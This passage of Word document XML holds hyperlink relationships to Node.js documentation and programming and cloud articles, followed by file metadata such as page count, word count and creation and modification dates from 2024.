Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/api/child_process.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.toptal.com/javascript/asynchronous-javascript-async-await-tutor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odejs.org/api/domain.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xenonstack.com/insights/hybrid-vs-multi-vs-hybrid-multi-clou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6366-E563-4A52-95BB-2BF871C2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5918</TotalTime>
  <Pages>175</Pages>
  <Words>88778</Words>
  <Characters>506040</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>4217</Lines>
  <Paragraphs>1187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444</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-16T06:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-28T08:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>